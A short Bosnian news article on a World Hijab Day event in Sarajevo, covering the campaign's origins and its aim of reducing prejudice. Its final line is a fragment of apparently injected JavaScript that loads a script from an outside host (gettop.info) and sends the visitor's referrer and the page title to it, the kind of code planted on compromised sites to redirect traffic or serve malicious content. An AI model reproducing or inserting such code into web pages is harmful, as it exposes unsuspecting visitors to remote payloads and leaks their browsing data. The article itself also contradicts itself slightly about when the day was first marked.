Svjetski dan hidžaba

MIZ Sarajevo u Sarajevu danas organizuje obilježavanje Svjetskog dana hidžaba. Na platou Baščaršije, građanke Sarajeva bez obzira na vjeru imaće priliku da od 13 do 15 sati postavljaju pitanja, vide kako izgleda nošenje mahrame, te da se tako fotografišu.

Cilj obilježavanja Svjetskog dana hidžaba je rušenje predrasuda, istakla je bh. predstavnica tima Svjetski dan hižaba Almedina Mušinbegović.

Kampanja obilježavanja Svjetskog dana hidžaba potekla je iz New Yorka na inicijativu jedne studentice muslimanke sa hidžabom koja je poslije terorističkog napada 2001.godine počela doživljavati razne neugodnosti od strane svojih kolega radi nepoznavanja islama, kao i neznanja razloga njenog prakticiranja hidžaba.

Tako je došla na ideju kampanje kao sredstvo poticanja vjerske tolerancije i razumijevanja pozivajući sve žene, muslimanke koje ne nose hidžab kao i nemuslimanke da na samo na jedan dan pokušaju osjetiti što znači nositi hidžab. Taj dan nije čin obožavanja već učinkovit način da se promjeni nepravilno viđenje hidžaba, stoga je prošle godine prvi put obilježen Svjetski dan hidžaba.

Akcija je organizovana u cilju otklanjanja barijera i radi boljeg razumijevanja i rušenja predrasuda, kao i kontraverzi koje se vežu za hidžab, koji je prvenstveno izbor muslimanki.

Prethodnih godina ova akcija je naišla brzo na reakcije i na veliki odziv u zemljama kao što su: Velika Britanija, Australija, Indija, Pakistam Francuska i Njemačka.

Ovaj događaj želi da razvije svijest o hidžabu kao islamskom ženskom pravu i da osvijesti javnost o korijenima i razlozima nošenja hidžaba.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }